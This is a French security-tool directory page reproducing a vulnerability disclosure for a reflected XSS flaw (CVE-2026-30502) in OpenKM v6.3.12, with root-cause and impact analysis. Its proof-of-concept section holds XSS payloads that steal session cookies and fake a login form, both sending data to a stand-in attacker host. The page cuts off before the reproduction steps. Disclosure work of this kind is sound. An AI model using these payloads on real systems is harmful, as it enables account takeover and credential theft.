Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS — Documentation et preuve de concept pour CVE-2026-30502, une vulnérabilité XSS réfléchie dans OpenKM v6.3.12. Comprend une analyse technique, la cause racine, l'évaluation de l'impact et des conseils de correction pour les chercheurs en sécurité et les testeurs d'intrusion. | Kitploit
Outils/GitHubGitHub/dharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss
Outils de PhishingAnalyse des VulnérabilitésExploitation d'Applications WebTests d'IntrusionArticles et RechercheApprentissage et Éducation
GitHubdharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss

CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Documentation et preuve de concept pour CVE-2026-30502, une vulnérabilité XSS réfléchie dans OpenKM v6.3.12. Comprend une analyse technique, la cause racine, l'évaluation de l'impact et des conseils de correction pour les chercheurs en sécurité et les testeurs d'intrusion.

Voir le dépôt
19il y a 3 moisPas encore vérifié

🛡️ CVE-2026-30502 — XSS Réfléchi dans OpenKM v6.3.12

CVE Badge OpenKM Type Disclosure Status

Découvert et signalé par Dharmendra Kumar — Chercheur en sécurité

Cybersécurité | Test d'intrusion | Recherche de vulnérabilités | Divulgation responsable


📌 Table des matières

  • Vue d'ensemble
  • Détails du CVE
  • Produit concerné
  • Description de la vulnérabilité
  • Analyse de la cause racine
  • Impact et évaluation des risques
  • Preuve de concept (PoC)
  • Remédiation et recommandations
  • Calendrier de divulgation
  • Références
  • À propos du chercheur

🔍 Vue d'ensemble

Ce dépôt documente la divulgation responsable de CVE-2026-30502, une vulnérabilité de Cross-Site Scripting Réfléchi (XSS) identifiée dans OpenKM v6.3.12 — un système de gestion documentaire open source largement déployé dans les environnements d'entreprise et gouvernementaux.

La vulnérabilité existe dans le paramètre Content, qui renvoie l'entrée fournie par l'utilisateur au navigateur sans validation ni encodage de sortie approprié. Un attaquant peut créer une URL malveillante contenant du JavaScript intégré et amener une victime à cliquer dessus via une ingénierie sociale, ce qui entraîne l'exécution de scripts dans la session du navigateur de la victime.

⚠️ Sévérité : Moyenne–Élevée | Vecteur d'attaque : Réseau | Privilèges requis : Aucun | Interaction utilisateur : Requise


📋 Détails du CVE

ChampDétails
ID CVECVE-2026-30502
ProduitOpenKM
Version affectéev6.3.12
Classe de vulnérabilitéCross-Site Scripting Réfléchi (XSS)
Paramètre vulnérableContent
CWECWE-79 : Mauvaise neutralisation des entrées lors de la génération des pages web
Vecteur CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
SévéritéMoyenne–Élevée
ÉditeurMITRE CVE Program
ChercheurDharmendra Kumar
Type de divulgationResponsable / Coordonnée

📦 Produit concerné

OpenKM est un système de gestion documentaire (DMS) gratuit et open source qui fournit une interface web pour gérer, auditer et distribuer des documents professionnels. Il est utilisé par des entreprises, des organismes gouvernementaux et des établissements d'enseignement dans le monde entier.

  • Nom du produit : Système de gestion documentaire OpenKM
  • Version affectée : v6.3.12
  • Site web du fournisseur : https://www.openkm.com
  • Catégorie : Système de gestion documentaire (DMS)
  • Langage / Stack : Java (JSP / Spring Framework)

🧨 Description de la vulnérabilité

Une vulnérabilité de Cross-Site Scripting Réfléchi (XSS) a été identifiée dans OpenKM v6.3.12 via le paramètre Content. L'application ne valide ni n'encode l'entrée fournie par l'utilisateur avant de la renvoyer dans le corps de la réponse HTTP, permettant d'injecter et d'exécuter du JavaScript arbitraire dans le navigateur de la victime.

Contrairement au XSS stocké, une charge utile XSS réfléchie n'est pas persistée dans la base de données — elle est transportée dans une URL spécialement conçue. L'attaque repose sur le fait que la victime est amenée à cliquer sur un lien malveillant (via e-mail, réseaux sociaux ou campagnes de phishing), après quoi la charge utile s'exécute silencieusement dans son navigateur avec le contexte de sa session.

Flux de l'attaque

L'attaquant crée une URL malveillante
        │
        ▼
La victime clique sur le lien (phishing / ingénierie sociale)
        │
        ▼
Le navigateur envoie une requête GET/POST avec la charge utile dans le paramètre `Content`
        │
        ▼
OpenKM reflète l'entrée non nettoyée directement dans la réponse HTML
        │
        ▼
Le navigateur analyse et exécute le JavaScript injecté
        │
        ▼
Session détournée / identifiants volés / compte compromis

🔬 Analyse de la cause racine

La vulnérabilité résulte de l'incapacité de l'application à appliquer des contrôles de sécurité entrée-sortie sur le paramètre Content :

FaiblesseDescription
❌ Aucune validation d'entréeLe paramètre Content accepte les caractères HTML/JavaScript bruts sans restriction ni filtrage
❌ Aucun encodage de sortieLes valeurs réfléchies sont écrites dans la réponse HTML sans encodage d'entités HTML
❌ En-tête CSP manquantAucune politique de sécurité du contenu n'est appliquée pour bloquer l'exécution de scripts en ligne
❌ Cookies sans HttpOnlyLes jetons de session sont accessibles via JavaScript, permettant le vol direct de cookies
URL créée par l'utilisateur ──► Paramètre Content ──► [Aucune validation]
       ──► Réfléchi dans la réponse HTML ──► [Aucun encodage]
              ──► Le navigateur exécute le script ──► Compte compromis

💥 Impact et évaluation des risques

Une exploitation réussie de cette vulnérabilité peut entraîner :

RisqueDescription
🍪 Détournement de sessionVol des jetons de session actifs via document.cookie pour usurper l'identité de la victime
🔑 Vol d'identifiantsInjection de superpositions de connexion factices pour capturer les noms d'utilisateur et mots de passe en clair
📤 Divulgation d'informationsExfiltration du contenu de documents sensibles, des données utilisateur ou des configurations internes
🎣 Attaques de phishingAffichage de pages factices convaincantes hébergées sur le domaine de confiance d'OpenKM
👤 Prise de contrôle de compteExécution d'actions authentifiées arbitraires au nom de la victime
⚙️ Actions non autoriséesModification, suppression ou exfiltration de documents dans le DMS
🖥️ Distribution de logiciels malveillantsRedirection des victimes vers des sites contrôlés par l'attaquant hébergeant des téléchargements malveillants

🧪 Preuve de concept (PoC)

⚠️ Avertissement : Les informations suivantes sont partagées strictement à des fins éducatives et de recherche en sécurité dans le cadre des principes de divulgation responsable. Ne testez ni n'utilisez cela contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite explicite d'évaluation.

Exemples de charges utiles (Génériques)

// Preuve d'exécution de base
<script>alert('CVE-2026-30502 - XSS par Dharmendra Kumar')</script>

// Exfiltration de cookie de session
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>

// Superposition de phishing d'identifiants
<script>
  var d=document.createElement('div');
  d.innerHTML='<form action="https://attacker.example.com/log" method="POST">'
    +'<input name="u" placeholder="Nom d\'utilisateur"/>'
    +'<input name="p" type="password" placeholder="Mot de passe"/>'
    +'<button>Se connecter</button></form>';
  document.body.prepend(d);
</script>

Structure d'URL malveillante créée

https://instance-cible-openkm/[point-de-termine-vulnerable]?Content=<script>alert(1)</script>

Étapes pour reproduire

Télécharger l’outil